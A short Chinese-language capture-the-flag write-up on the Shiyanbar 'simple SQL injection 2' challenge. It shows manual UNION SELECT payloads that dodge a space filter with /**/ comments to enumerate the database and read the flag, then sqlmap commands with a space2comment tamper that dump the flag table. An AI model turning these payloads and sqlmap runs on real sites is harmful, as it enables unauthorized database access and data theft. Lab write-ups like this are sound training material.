实验吧web-简单的sql注入2

第二天sql注入，还是一只小白。。。
一、
1、首先输入1，没啥结果

image.png

2、输入1'，和上面一样
3、输入1 '(加了空格)，被禁止，于是空格不过

image.png
4、输入'or'1，出现不知道的东西
image.png
5、database()被和谐了，直接查全部

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

image.png

6、接下来查表

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

image.png

7、字段

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1

image.png

8、值

1'/**/union/**/select/**/flag/**/from/**/flag/**/where'1'='1

image.png

(有一个神奇的地方是上次各种双写这次没有，还有一个是上次'后面有一个空格这次也没有)

二、接下来上sqlmap吧，接4
1、跳双写,查库

sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment --dbs

image.png

2、知库查表

sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 --tables

image.png

3、知库、表，查字段

sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag --columns

image.png

4、知库、表、字段，查值

sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag -C flag --dump

image.png

完成